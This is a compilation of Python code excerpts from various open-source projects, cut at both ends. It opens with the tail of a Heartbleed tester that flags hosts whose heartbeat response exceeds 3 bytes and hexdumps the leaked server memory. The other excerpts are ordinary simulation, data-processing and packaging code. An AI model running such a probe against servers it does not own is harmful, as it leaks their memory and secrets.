                if verbose: print '[INFO] Closing connection'
                s.close()
                print ''
                sys.stdout.flush()
                return False
            
            if type == 24:
                if len(payload) > 3:
                    print '\033[91m\033[1m[FAIL] Heartbeat response was ' + str(len(payload)) + ' bytes instead of 3! ' + str(ip) + ':' + str(port) + ' is vulnerable over, find  vulnerability ' + tlslongver + '\033[0m'
                    if display_null_bytes:
                        print '[INFO] Displaying response:'
                    else:
                        print '[INFO] Displaying response (lines consisting entirely of null bytes are removed):'
                    print ''
                    hexdump(payload)
                    print ''
                    if verbose: print '[INFO] Closing connection\n'
                    sys.stdout.flush()
                    s.close()
                    return True
                else:
                    print '[INFO] The server processed the malformed heartbeat, but did not return any extra data.\n'
                    sys.stdout.flush()
                    return False
            
            if type == 21:
                print '[INFO] The server received an alert. It is likely not vulnerable.'
                if verbose: print '[INFO] Alert Level: ' + alert_levels[ord(payload[0])]
                if verbose: print '[INFO] Alert Description: ' + alert_descriptions[ord(payload[1])] + ' (see RFC 5246 section 7.2)'
                if verbose: print '[INFO] Closing connection'
                s.close()
                print ''
                sys.stdout.flush()
                return False
    
    except socket.error as e:
        print >> sys.stderr, '\033[93m[ERROR] Connection error. The port might not be open on the host.\033[0m\n'
        sys.stderr.flush()
        return False

Example 21

Project: cardoon Source File: tran.py
    def run(self, circuit):
        """
        Calculates transient analysis by solving nodal equations
        """
        # for now just print some fixed stuff
        print('cuem**************************************************')
        print('                 Transient analysis')
        print('******************************************************')
        if hasattr(circuit, 'title'):
            print('\n', circuit.title, '\n')

        if glVar.sparse:
            nd = nodalSP
        else:
            nd = nodal
            print('Using dense matrices\n')

        # Only works with flattened circuits
        if not circuit._flattened:
            circuit.flatten()
            circuit.init()

        # Select integration method
        if self.im == 'BE':
            imo = BEuler()
        elif self.im == 'trap':
            imo = Trapezoidal()
        else:
            raise analysis.AnalysisError(
                'Unknown integration method: {0}'.format(self.im))

        # Create nodal objects and solve for initial state
        nd.make_nodal_circuit(circuit)
        dc = nd.DCNodal(circuit)
        tran = nd.TransientNodal(circuit, imo)
        x = dc.get_guess()
        # Use sources including transient values for t == 0
        sV = tran.get_source(0.)
        # solve DC equations
        try: 
            print('Calculating DC operating point ... ', end='')
            sys.stdout.flush()
            (x, res, iterations) = solve(x, sV, dc.convergence_helpers)
            print('Succeded.\n')
        except NoConvergenceError as ce:
            print('Failed.\n')
            print(ce)
            return
        dc.save_OP(x)
        tran.set_IC(self.tstep)
        # Release memory in dc object?
        del(dc)

        # Create time vector
        timeVec = np.arange(start=0., stop = self.tstop, step = self.tstep, 
                            dtype=float)
        nsamples = len(timeVec)
        circuit.tran_timevec = timeVec

        # Get terminals to plot/save from circuit. 
        termSet = circuit.get_requested_terms('tran')

        # Special treatment for ground terminal
        termSet1 = set(termSet)
        if circuit.nD_ref in termSet1:
            termSet1.remove(circuit.nD_ref)
            circuit.nD_ref.tran_v = np.zeros(nsamples)

        # Allocate vectors for results
        if self.saveall:
            for term in circuit.nD_termList:
                term.tran_v = np.empty(nsamples)
                term.tran_v[0] = x[term.nD_namRC]                
            circuit.nD_ref.tran_v = np.zeros(nsamples)
        else:
            # Only save requested nodes
            for term in termSet1:
                term.tran_v = np.empty(nsamples)
                term.tran_v[0] = x[term.nD_namRC]

        # Save initial values
        xOld = x
        tIter = 0
        tRes = 0.
        dots = 50
        print('System dimension: {0}'.format(circuit.nD_dimension))
        print('Number of samples: {0}'.format(nsamples))
        print('Integration method: {0}'.format(self.im))
        if self.verbose:
            print('-------------------------------------------------')
            print(' Step    | Time (s)     | Iter.    | Residual    ')
            print('-------------------------------------------------')
        else:
            print('Printing one dot every {0} samples:'.format(dots))
            sys.stdout.flush()

        for i in xrange(1, nsamples):
            tran.accept(xOld)
            sV = tran.get_rhs(timeVec[i])
            # solve equations: use previous time-step solution as an
            # initial guess
            if i > 1:
                # Re-use factorized Jacobian: This saves the time to
                # evaluate the function and Jacobian plus the time for
                # factorization. Only sparse implementation stores
                # factorized Jacobian
                xOld += tran.get_chord_deltax(sV)
            try: 
                (x, res, iterations) = solve(xOld, sV, 
                                             tran.convergence_helpers)
            except NoConvergenceError as ce:
                print(ce)
                return

            # Save results
            xOld[:] = x
            if self.saveall:
                for term in circuit.nD_termList:
                    term.tran_v[i] = x[term.nD_namRC]                
            else:
                # Only save requested nodes
                for term in termSet1:
                    term.tran_v[i] = x[term.nD_namRC]
            # Keep some info about iterations
            tIter += iterations
            tRes += res
            if self.verbose:
                print('{0:8} | {1:12} | {2:8} | {3:12}'.format(
                        i, timeVec[i], iterations, res))
            elif not i%dots:
                print('.', end='')
                sys.stdout.flush()

        # Calculate average residual and iterations
        avei = float(tIter) / nsamples
        aver = tRes / nsamples
        print('\nAverage iterations: {0}'.format(avei))
        print('Average residual: {0}\n'.format(aver))

        # Process output requests.  
        analysis.process_requests(circuit, 'tran', 
                                  timeVec, 'Time [s]', 'tran_v')

        def getvec(termname):
            return circuit.find_term(termname).tran_v

        if self.shell:
            analysis.ipython_drop("""
Available commands:
    timeVec: time vector
    getvec(<terminal>) to retrieve results (if result saved)
""", globals(), locals())

Example 22

Project: COMMIT Source File: core.py
    def load_dictionary( self, path, use_mask = False ) :
        """Load the sparse structure previously created with "trk2dictionary" script.

        Parameters
        ----------
        path : string
            Folder containing the output of the trk2dictionary script (relative to subject path)
        use_mask : boolean
            If False (default) the optimization will be conducted only on the voxels actually
            traversed by tracts. If True, the mask specified in trk2dictionary
            (i.e. "filename_mask" paramater) will be used instead.
            NB: if no mask was specified in trk2dictionary, the "tdi" and
            "mask" masks are equivalent and this parameter is not influent.
        """
        if self.niiDWI is None :
            raise RuntimeError( 'Data not loaded; call "load_data()" first.' )

        tic = time.time()
        print '\n-> Loading the dictionary:'
        self.DICTIONARY = {}
        self.set_config('TRACKING_path', pjoin(self.get_config('DATA_path'),path))

        # load mask
        self.set_config('dictionary_mask', 'mask' if use_mask else 'tdi' )
        mask_filename = pjoin(self.get_config('TRACKING_path'),'dictionary_%s.nii'%self.get_config('dictionary_mask'))
        if not exists( mask_filename ) :
            mask_filename += '.gz'
            if not exists( mask_filename ) :
                raise RuntimeError( 'Dictionary not found. Execute ''trk2dictionary'' script first.' );
        niiMASK = nibabel.load( mask_filename )
        self.DICTIONARY['MASK'] = (niiMASK.get_data() > 0).astype(np.uint8)

        # segments from the tracts
        # ------------------------
        print '\t* segments from the tracts...',
        sys.stdout.flush()

        self.DICTIONARY['IC'] = {}

        self.DICTIONARY['TRK'] = {}

        self.DICTIONARY['TRK']['norm'] = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_TRK_norm.dict'), dtype=np.float32 )

        self.DICTIONARY['IC']['nF'] = self.DICTIONARY['TRK']['norm'].size

        self.DICTIONARY['IC']['fiber'] = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_f.dict'), dtype=np.uint32 )

        self.DICTIONARY['IC']['n'] = self.DICTIONARY['IC']['fiber'].size

        vx = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_vx.dict'), dtype=np.uint8 ).astype(np.uint32)
        vy = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_vy.dict'), dtype=np.uint8 ).astype(np.uint32)
        vz = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_vz.dict'), dtype=np.uint8 ).astype(np.uint32)
        self.DICTIONARY['IC']['v'] = vx + self.get_config('dim')[0] * ( vy + self.get_config('dim')[1] * vz )
        del vx, vy, vz

        ox = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_ox.dict'), dtype=np.uint8 ).astype(np.uint16)
        oy = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_oy.dict'), dtype=np.uint8 ).astype(np.uint16)
        self.DICTIONARY['IC']['o'] = oy + 181*ox
        del ox, oy

        self.DICTIONARY['IC']['len'] = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_IC_len.dict'), dtype=np.float32 )

        self.DICTIONARY['TRK']['len'] = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_TRK_len.dict'), dtype=np.float32 )

        if self.get_config('doNormalizeKernels') :
            # divide the length of each segment by the fiber length so that all the columns of the libear operator will have same length
            # NB: it works in conjunction with the normalization of the kernels
            sl = self.DICTIONARY['IC']['len']
            tl = self.DICTIONARY['TRK']['norm']
            f  = self.DICTIONARY['IC']['fiber']
            for s in xrange(self.DICTIONARY['IC']['n']) :
                sl[s] /= tl[ f[s] ]

        # reorder the segments based on the "v" field
        idx = np.argsort( self.DICTIONARY['IC']['v'], kind='mergesort' )
        self.DICTIONARY['IC']['v']     = self.DICTIONARY['IC']['v'][ idx ]
        self.DICTIONARY['IC']['o']     = self.DICTIONARY['IC']['o'][ idx ]
        self.DICTIONARY['IC']['fiber'] = self.DICTIONARY['IC']['fiber'][ idx ]
        self.DICTIONARY['IC']['len']   = self.DICTIONARY['IC']['len'][ idx ]
        del idx

        print '[ %d fibers and %d segments ]' % ( self.DICTIONARY['IC']['nF'], self.DICTIONARY['IC']['n'] )

        # segments from the peaks
        # -----------------------
        print '\t* segments from the peaks...',
        sys.stdout.flush()

        self.DICTIONARY['EC'] = {}

        vx = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_EC_vx.dict'), dtype=np.uint8 ).astype(np.uint32)
        vy = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_EC_vy.dict'), dtype=np.uint8 ).astype(np.uint32)
        vz = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_EC_vz.dict'), dtype=np.uint8 ).astype(np.uint32)
        self.DICTIONARY['EC']['v'] = vx + self.get_config('dim')[0] * ( vy + self.get_config('dim')[1] * vz )
        del vx, vy, vz

        self.DICTIONARY['EC']['nE'] = self.DICTIONARY['EC']['v'].size

        ox = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_EC_ox.dict'), dtype=np.uint8 ).astype(np.uint16)
        oy = np.fromfile( pjoin(self.get_config('TRACKING_path'),'dictionary_EC_oy.dict'), dtype=np.uint8 ).astype(np.uint16)
        self.DICTIONARY['EC']['o'] = oy + 181*ox
        del ox, oy

        # reorder the segments based on the "v" field
        idx = np.argsort( self.DICTIONARY['EC']['v'], kind='mergesort' )
        self.DICTIONARY['EC']['v'] = self.DICTIONARY['EC']['v'][ idx ]
        self.DICTIONARY['EC']['o'] = self.DICTIONARY['EC']['o'][ idx ]
        del idx

        print ' [ %d segments ]' % self.DICTIONARY['EC']['nE']

        # isotropic compartments
        # ----------------------
        print '\t* isotropic contributions...',
        sys.stdout.flush()

        self.DICTIONARY['ISO'] = {}

        self.DICTIONARY['nV'] = self.DICTIONARY['MASK'].sum()

        vx, vy, vz = ( self.DICTIONARY['MASK'] > 0 ).nonzero() # [TODO] find a way to avoid using int64 (not necessary and waste of memory)
        vx = vx.astype(np.int32)
        vy = vy.astype(np.int32)
        vz = vz.astype(np.int32)
        self.DICTIONARY['ISO']['v'] = vx + self.get_config('dim')[0] * ( vy + self.get_config('dim')[1] * vz )
        del vx, vy, vz

        # reorder the segments based on the "v" field
        idx = np.argsort( self.DICTIONARY['ISO']['v'], kind='mergesort' )
        self.DICTIONARY['ISO']['v'] = self.DICTIONARY['ISO']['v'][ idx ]
        del idx

        print ' [ %d voxels ]' % self.DICTIONARY['nV']

        # post-processing
        # ---------------
        print '\t* post-processing...',
        sys.stdout.flush()

        # get the indices to extract the VOI as in MATLAB (in place of DICTIONARY.MASKidx)
        idx = self.DICTIONARY['MASK'].ravel(order='F').nonzero()[0]
        self.DICTIONARY['MASK_ix'], self.DICTIONARY['MASK_iy'], self.DICTIONARY['MASK_iz'] = np.unravel_index( idx, self.DICTIONARY['MASK'].shape, order='F' )

        lut = np.zeros( self.get_config('dim'), dtype=np.uint32 ).ravel()
        for i in xrange(idx.size) :
            lut[ idx[i] ] = i
        self.DICTIONARY['IC'][ 'v'] = lut[ self.DICTIONARY['IC'][ 'v'] ]
        self.DICTIONARY['EC'][ 'v'] = lut[ self.DICTIONARY['EC'][ 'v'] ]
        self.DICTIONARY['ISO']['v'] = lut[ self.DICTIONARY['ISO']['v'] ]

        print '         [ OK ]'

        print '   [ %.1f seconds ]' % ( time.time() - tic )

Example 23

Project: SchoolIdolAPI Source File: migrate_activities.py
    def handle(self, *args, **options):

        print 'Delete activities max bonded/max leveled...'
        while models.Activity.objects.filter(Q(message='Max Leveled a card') | Q(message='Max Bonded a card')).count():
            ids = list(models.Activity.objects.filter(Q(message='Max Leveled a card') | Q(message='Max Bonded a card')).values_list('pk', flat=True)[:100])
            total_this = models.Activity.objects.filter(pk__in=ids).delete()
        print 'Done.'

        print 'Delete activities rank in event without ranking...'
        while get_rankevent_withoutranking_queryset().count():
            ids = list(get_rankevent_withoutranking_queryset().values_list('pk', flat=True)[:100])
            total_this = get_rankevent_withoutranking_queryset().filter(pk__in=ids).delete()
        print 'Done.'

        print 'Cache for owned cards activities'
        while get_ownedcardqueryset().count():
            activities_ownedcards = get_ownedcardqueryset()[:500]
            for activity in activities_ownedcards:
                account = activity.ownedcard.owner_account
                # Fix account
                activity.account = account
                # Cache
                activity = activity_cache_account(activity, account)
                activity.message_data = concat_args(unicode(activity.ownedcard.card), activity.ownedcard.stored)
                activity.right_picture_link = singlecardurl(activity.ownedcard.card)
                activity.right_picture = ownedcardimageurl({}, activity.ownedcard)
                activity.save()
            print '.',
            sys.stdout.flush()
        print 'Done.'

        print 'Cache for rank up activities'
        while get_rankupqueryset().count():
            activities_rankup = get_rankupqueryset()[:500]
            for activity in activities_rankup:
                # Cache
                activity = activity_cache_account(activity, activity.account)
                activity.message_data = concat_args(activity.number)
                activity.save()
            print '.',
            sys.stdout.flush()
        print 'Done.'

        print 'Cache for Rank in event activities'
        while get_rankeventqueryset().count():
            activities_rankevent = get_rankeventqueryset()[:500]
            for activity in activities_rankevent:
                # Cache
                activity = activity_cache_account(activity, activity.account)
                activity.message_data = concat_args(activity.eventparticipation.ranking,
                                                    unicode(activity.eventparticipation.event))
                activity.right_picture = eventimageurl({}, activity.eventparticipation.event, english=(activity.account.language != 'JP'))
                activity.right_picture_link = '/events/' + activity.eventparticipation.event.japanese_name + '/'
                activity.save()
            print '.',
            sys.stdout.flush()
        print 'Done.'

        print 'Remove duplicate activities with ownedcards'
        lastSeenId = float('-Inf')
        i = 0
        total_deleted = 0
        while get_duplicateownedcard_queryset()[i:i+500].count():
            activities_ownedcards = get_duplicateownedcard_queryset()[i:i+500]
            for activity in activities_ownedcards:
                if activity.ownedcard_id == lastSeenId:
                    print 'delete', activity
                    activity.delete()
                    total_deleted += 1
                else:
                    lastSeenId = activity.ownedcard_id
                pass
            i += 500
            print '.',
            sys.stdout.flush()
        print 'Done.'

Example 24

Project: mrepo Source File: wrapperUtils.py
    def callback(self, what, amount, total, hdr, path):
#        print "what: %s amount: %s total: %s hdr: %s path: %s" % (
#          what, amount, total, hdr, path)

        if what == rpm.RPMCALLBACK_INST_OPEN_FILE:
            fileName = "%s/%s-%s-%s.%s.rpm" % (path,
                                               hdr['name'],
                                               hdr['version'],
                                               hdr['release'],
                                               hdr['arch'])
            try:
                self.fd = os.open(fileName, os.O_RDONLY)
            except OSError:
                raise up2dateErrors.RpmError("Error opening %s" % fileName)

            return self.fd
        elif what == rpm.RPMCALLBACK_INST_CLOSE_FILE:
            os.close(self.fd)
            self.fd = 0

        elif what == rpm.RPMCALLBACK_INST_START:
            self.hashesPrinted = 0
            self.lastPercent = 0
            if type(hdr) == type(""):
                print "     %-23.23s" % ( hdr),
                sys.stdout.flush()

            else:
                fileName = "%s/%s-%s-%s.%s.rpm" % (path,
                                                   hdr['name'],
                                                   hdr['version'],
                                                   hdr['release'],
                                                   hdr['arch'])
                if self.cfg["isatty"]:
                    if self.progressCurrent == 0:
                        printit("Installing") 
                    print "%4d:%-23.23s" % (self.progressCurrent + 1,
                                            hdr['name']),
                    sys.stdout.flush()
                else:
                    printit("Installing %s" % fileName)


        # gets called at the start of each repackage, with a count of
        # which package and a total of the number of packages aka:
        # amount: 2 total: 7 for the second package being repackages
        # out of 7. That sounds obvious doesnt it?
        elif what == rpm.RPMCALLBACK_REPACKAGE_PROGRESS:
            pass
#            print "what: %s amount: %s total: %s hdr: %s path: %s" % (
#            what, amount, total, hdr, path)
#            self.printRpmHash(amount, total, noInc=1)
            
        elif what == rpm.RPMCALLBACK_REPACKAGE_START:
            printit( "Repackaging")
            #sys.stdout.flush()
            #print "what: %s amount: %s total: %s hdr: %s path: %s" % (
            # what, amount, total, hdr, path)
            
        elif what == rpm.RPMCALLBACK_INST_PROGRESS:
            if type(hdr) == type(""):
                # repackage...
                self.printRpmHash(amount,total, noInc=1)
            else:
                self.printRpmHash(amount,total)


        elif what == rpm.RPMCALLBACK_TRANS_PROGRESS:
            self.printRpmHash(amount, total, noInc=1)

            
        elif what == rpm.RPMCALLBACK_TRANS_START:
            self.hashesPrinted = 0
            self.lastPercent = 0
            self.progressTotal = 1
            self.progressCurrent = 0
            print "%-23.23s" % "Preparing",
            sys.stdout.flush()

        elif what == rpm.RPMCALLBACK_TRANS_STOP:
            self.printRpmHash(1, 1)
            self.progressTotal = self.packagesTotal
            self.progressCurrent = 0
            
        elif (what == rpm.RPMCALLBACK_UNINST_PROGRESS or
              what == rpm.RPMCALLBACK_UNINST_START or
              what == rpm.RPMCALLBACK_UNINST_STOP):
            pass
        
        if hasattr(rpm, "RPMCALLBACK_UNPACK_ERROR"):
            if ((what == rpm.RPMCALLBACK_UNPACK_ERROR) or
                (what == rpm.RPMCALLBACK_CPIO_ERROR)):
                pkg = "%s-%s-%s" % (hdr[rpm.RPMTAG_NAME],
                                    hdr[rpm.RPMTAG_VERSION],
                                    hdr[rpm.RPMTAG_RELEASE])

                if what == rpm.RPMCALLBACK_UNPACK_ERROR:
                    raise up2dateErrors.RpmInstallError, (
                        "There was a rpm unpack error "\
                        "installing the package: %s" % pkg, pkg)
                elif what == rpm.RPMCALLBACK_CPIO_ERROR:
                    raise up2dateErrors.RpmInstallError, (
                        "There was a cpio error "\
                        "installing the package: %s" % pkg, pkg)

Example 25

Project: pyNastran Source File: run_mapping.py
def run_mapping():
    required_inputs = load_inputs()
    structural_call = required_inputs['structural_call']
    isubcase = required_inputs['isubcase']

    configpath = required_inputs['configpath']
    workpath = required_inputs['workpath']

    print("structural_call = %r" % structural_call)

    # load mapping
    cart3dLoads = os.path.join(workpath, 'Cart3d_35000_0.825_10_0_0_0_0.i.triq')
    bdfModel = os.path.join(configpath, 'aeroModel_mod.bdf')
    bdfModelOut = os.path.join(workpath, 'fem_loads_3.bdf')
    # mappingMatrix.new.out - stored in workpath

    # deflection mapping
    cart3dGeom = os.path.join(configpath, 'Cart3d_bwb.i.tri')
    cart3dGeom2 = os.path.join(workpath, 'Components.i.tri')
    bdf = os.path.join(workpath, 'fem3.bdf')
    #op2 = os.path.join(workpath, 'fem3.op2')
    f06 = os.path.join(workpath, 'fem3.f06')

    assert os.path.exists(bdf), '%r doesnt exist' % bdf
    assert os.path.exists(bdfModel), '%r doesnt exist' % bdfModel
    assert os.path.exists(cart3dGeom), '%r doesnt exist' % cart3dGeom

    os.chdir(workpath)
    copy_file(cart3dGeom, 'Components.i.tri')

    node_list = [
        20037, 21140, 21787, 21028, 1151, 1886, 2018, 1477, 1023, 1116, 1201,
        1116, 1201, 1828, 2589, 1373, 1315, 1571, 1507, 1532, 1317, 1327, 2011,
        1445, 2352, 1564, 1878, 1402, 1196, 1234, 1252, 1679, 1926, 1274, 2060,
        2365, 21486, 20018, 20890, 20035, 1393, 2350, 1487, 1530, 1698, 1782
    ]
    with open('convergeDeflections.out', 'ab') as outfile:
        max_aero_deflection_old = 0.
        niterations = 30
        #icart = 1
        for i in range(1, niterations):
            strI = '_' + str(i)
            assert os.path.exists('Components.i.tri')
            #if i==iCart:
            if 0:
                # run cart3d
                log.info("---running Cart3d #%s---" % i)
                sys.stdout.flush()

                # runs cart3d.i.tri, makes Components.i.triq
                fail_flag = os.system('./COMMAND > command.out')
                assert fail_flag == 0, 'Cart3d ./COMMAND failed on iteration #%s' % i
                move_file('Components.i.triq', cart3dLoads)
                copy_file(cart3dLoads, cart3dLoads + strI)
                copy_file('forces.dat', 'forces.dat' + strI)
                copy_file('moments.dat', 'moments.dat' + strI)
                copy_file('loadsCC.dat', 'loadsCC.dat' + strI)
                copy_file('history.dat', 'history.dat' + strI)
                os.remove('Components.i.tri') # verifies new Components.i.tri gets created
                sys.stdout.flush()

            # map loads
            run_map_loads(required_inputs, cart3dLoads, bdfModel, bdfModelOut)  # maps loads
            copy_file(bdfModelOut, bdfModelOut + strI)

            # run nastran
            log.info("---running Nastran #%s---" % i)
            sys.stdout.flush()
            # runs fem3.bdf with fem_loads_3.bdf
            #fail_flag = os.system('nastran scr=yes bat=no fem3.bdf')
            #assert fail_flag == 0,'nastran failed on iteration #%s' % i
            #copy_file('fem3.op2', 'fem3.op2' + strI)
            copy_file('fem3.f06', 'fem3.f06' + strI)

            # map deflections
            (wA, wS) = run_map_deflections(node_list, bdf, f06, cart3dGeom, cart3dGeom2, log=log)
            #(wA, wS) = run_map_deflections(nodeList, bdf, op2, cart3dGeom, cart3dGeom2, log=log)
            assert os.path.exists('Components.i.tri')

            # cleans up fem_loads.bdf
            os.remove(bdfModelOut)
            #if 0:
                # disabled b/c nastran isn't on this computer
                #os.remove(op2) # verifies new fem3.op2 was created
                #os.remove(f06) # verifies new fem3.f06 was created

            # post-processing
            (max_aero_nid, max_aero_deflection) = max_dict(wA)
            max_structural_nid = '???'
            max_aero_deflection = wA[max_aero_nid]
            max_structural_deflection = max(wS)[0, 0]
            log.info("AERO      - i=%s max_aero_nid=%s max_aero_deflection=%s"   % (
                i, max_aero_nid, max_aero_deflection))
            log.info("STRUCTURE - i=%s max_structural_nid=%s max_structural_deflection=%s"   % (
                i, max_structural_nid, max_structural_deflection))
            outfile.write("AERO      - i=%s max_aero_nid=%s max_aero_deflection=%s\n" % (
                i, max_aero_nid, max_aero_deflection))
            outfile.write("STRUCTURE - i=%s max_structural_nid=%s max_structural_deflection=%s\n" % (
                i, max_structural_nid, max_structural_deflection))

            msg = '\n'+'*' * 80 + '\n'
            msg += 'finished iteration #%s\n' % (i)
            msg += '*' * 80 + '\n'
            log.info(msg)

            if allclose(max_aero_deflection, max_aero_deflection_old, atol=0.001):
                break
            max_aero_deflection_old = copy.deepcopy(max_aero_deflection)
            #icart += 1
            sys.stdout.flush()

    log.info('---finished runMapping.py---')

Example 26

Project: text2image Source File: alignDraw.py
Function: train
    def train(self, lr, epochs, save=False, validateAfter=0):
        self._build_train_function()
        sys.stdout.flush()

        if save == True:
            curr_time = datetime.datetime.now()
            weights_f_name = ("./attention-vae-%s-%s-%s-%s-%s-%s.h5" % (curr_time.year, curr_time.month, curr_time.day, curr_time.hour, curr_time.minute, curr_time.second))
            print weights_f_name

        all_outputs = np.array([0.0,0.0,0.0])
        iter_outputs = np.array([0.0,0.0,0.0])
        curr_iter = 0
        print_after = 100
        seen_examples = 0
        total_seen_examples = 0
        prev_outputs = np.array([float("inf"),float("inf"),float("inf")])
        prev_val_results = np.array([float("inf"),float("inf"),float("inf")])

        for epoch in xrange(0, epochs):
            a = datetime.datetime.now()
            
            self.train_iter.reset()
            while True:
                index_cap, index_im, cap_len = self.train_iter.next()
                if type(index_cap) == int:
                    break
                [kl, logpxz, log_likelihood, c_ts, read_attent_params, write_attent_params] = self._train_function(index_im, index_cap, cap_len, lr, self.runSteps)
                kl_total = kl * index_im.shape[0]
                logpxz_total = logpxz * index_im.shape[0]
                log_likelihood_total = log_likelihood * index_im.shape[0]
                all_outputs[0] = all_outputs[0] + kl_total
                all_outputs[1] = all_outputs[1] + logpxz_total
                all_outputs[2] = all_outputs[2] + log_likelihood_total
                iter_outputs[0] = iter_outputs[0] + kl_total
                iter_outputs[1] = iter_outputs[1] + logpxz_total
                iter_outputs[2] = iter_outputs[2] + log_likelihood_total
                seen_examples = seen_examples + index_im.shape[0]
                total_seen_examples = total_seen_examples + index_im.shape[0]

                if curr_iter % print_after == 0 and curr_iter != 0:
                    print 'Iteration %d ; Processed %d entries' % (curr_iter, total_seen_examples)
                    iter_outputs = iter_outputs / seen_examples
                    print float(iter_outputs[0]), float(iter_outputs[1]), float(iter_outputs[2])
                    print '\n'
                    iter_outputs = np.array([0.0,0.0,0.0])
                    seen_examples = 0
                    sys.stdout.flush()

                if curr_iter % (print_after*10) == 0 and curr_iter != 0:
                    self.save_weights(weights_f_name, c_ts, read_attent_params, write_attent_params)
                    print 'Done Saving Weights'
                    print '\n'
                    sys.stdout.flush()
                
                curr_iter = curr_iter + 1
            b = datetime.datetime.now()
            print("Epoch %d took %s" % (epoch, (b-a)))

            if save == True:
                self.save_weights(weights_f_name, c_ts, read_attent_params, write_attent_params)
                print 'Done Saving Weights'

            all_outputs = all_outputs / (self.input_shape[0] * 5) # 5 captions per image
            print 'Train Results'
            print float(all_outputs[0]), float(all_outputs[1]), float(all_outputs[2])

            if validateAfter != 0:
                if epoch % validateAfter == 0:
                    print 'Validation Results'
                    val_results = self.validate()
                    print float(val_results[0]), float(val_results[1]), float(val_results[2])
                    print '\n'

            if float(val_results[-1]) > float(prev_val_results[-1]):
                print("Learning Rate Decreased")
                lr = lr * 0.1
            elif self.reduceLRAfter != 0:
                if epoch == self.reduceLRAfter:
                    print ("Learning Rate Manually Decreased")
                    lr = lr * 0.1
            else:
                prev_val_results = np.copy(val_results)

            print '\n'
            all_outputs = np.array([0.0,0.0,0.0])
            sys.stdout.flush()

Example 27

Project: DIRAC Source File: dirac-fix-ld-library-path.py
def fixLDPath( root, ldpath, directory ):
  """
      This is a utility to fix the LD_LIBRARY_PATH on Grid WNs. The
      shared libraries from the original LD_LIBRARY_PATH are linked to
      the locally specified directory.  For Windows (and in general)
      this needs some refurbishment.
  """

  if os.path.exists( directory ):
    shutil.rmtree( directory )

  start = os.getcwd()
  os.mkdir( directory )
  os.chdir( directory )
  uniqueLD = uniquePath( ldpath )

  if DEBUG:
    print 'Unique LD LIBRARY PATH is:'
    print uniqueLD
    sys.stdout.flush()

  ldlist = uniqueLD.split( ':' )
  if DEBUG:
    print ''
    print 'LD List is:'
    print ldlist
    print ''
    sys.stdout.flush()

  for path in ldlist:
    if os.path.exists( path ):

      if DEBUG:
        print 'Searching for shared libraries in:'
        print path
        print '-----------------------------------------------'
        res = shellCall( 0, 'ls ' + path + '/*.so*' )
        if res['OK']:
          print res['Value']
        else:
          print res
        print '-----------------------------------------------'

      output = shellCall( 0, 'ls ' + path + '/*.so*' )
      #must be tidied for Windows (same below)

      if DEBUG:
        if not output['OK']:
          print 'cuem**********************'
          print 'Warning, problem with ls:'
          print output
          print '**************************'

      if not output['Value'][0]:
        ldlibs = output['Value'][1].split( '\n' )
        for lib in ldlibs:
          if os.path.exists( lib ):
            filename = os.path.basename( lib )
            output = shellCall( 0, 'ln -s ' + str( lib ) + ' ' + str( filename ) )
            #N.B. for Windows this should be a copy...
            if DEBUG:
              if not output['OK']:
                print '********************************'
                print 'Warning, problem creating link:'
                print 'File: ', filename
                print 'Path: ', lib
                print output
                print '********************************'

      if DEBUG:
        print 'Searching for rootmap file in:'
        print path
        print '-----------------------------------------------'
        res = shellCall( 0, 'ls ' + path + '/*rootmap*' )
        if res['OK']:
          print res['Value']
        else:
          print res
        print '-----------------------------------------------'

      output = shellCall( 0, 'ls ' + path + '/*rootmap*' )

      if DEBUG:
        if not output['OK']:
          print '**************************'
          print 'Warning, problem with rootmap:'
          print output
          print '**************************'

      if not output['Value'][0]:
        ldlibs = output['Value'][1].split( '\n' )
        for lib in ldlibs:
          if os.path.exists( lib ):
            if re.search( 'RELAX', lib ) is not None:
              filename = os.path.basename( lib )
              output = shellCall( 0, 'ln -s ' + str( lib ) + ' ' + str( filename ) )
              if DEBUG:
                if not output['OK']:
                  print '********************************'
                  print 'Warning, problem creating link:'
                  print 'File: ', filename
                  print 'Path: ', lib
                  print output
                  print '********************************'

  os.chdir( start )
  sys.stdout.flush()

Example 28

Project: vbo-convert Source File: vbo_to_ply.py
Function: convert
def convert(filename):

	# todo: get zoom from filename
	zoom=15# current zoom level - sets x & y scale relative to z values
	maximum_range = 4096 # tile-space coordinate maximum

	# convert from tile-space coords to meters, depending on zoom
	def tile_to_meters(zoom):
		return 40075016.68557849 / pow(2, zoom)

	conversion_factor = tile_to_meters(zoom) / maximum_range
	lines = []

	# get lines from input file
	with open(filename, 'r') as f:
		lines = [line.strip() for line in f]
	f.close()

	vertex_count = 0
	newlines = []

	# add vertex definitions
	for i, line in enumerate(lines):
		index = 0

		if len(line) == 0: # skip the occasional empty line
			continue

		newlines.append(line+"\n")
		vertex_count += 1
		# print('vertex_count', vertex_count)
		if (i % 1000 == 0): # print progress
			sys.stdout.flush()
			sys.stdout.write("\r"+(str(round(i / len(lines) * 100, 2))+"%"))

	sys.stdout.flush()
	sys.stdout.write("\r100%")
	sys.stdout.flush()

	# add simple face definitions - every three vertices make a face
	face_count = int(vertex_count / 3)
	for i in range(face_count):
		j = i*3
		newline = "3 "+str(j)+" "+str(j+1)+" "+str(j+2)+"\n"
		newlines.append(newline)

	name, extension = os.path.splitext(filename)
	OUTFILE = name + ".ply"
	open(OUTFILE, 'w').close() # clear existing OUTFILE, if any
	newfile = open(OUTFILE, "w")
	for line in newlines:
		newfile.write("%s" % line)
	newfile.close()

	def line_prepend(filename,line):
	    with open(filename,'r+') as f:
	        content = f.read()
	        f.seek(0,0)
	        f.write(line.rstrip('\r\n') + '\n' + content)

	# generate PLY header
	header = '''ply
	format ascii 1.0
	element vertex '''+str(vertex_count)+'''
	property float x
	property float y
	property float z
	element face '''+str(face_count)+'''
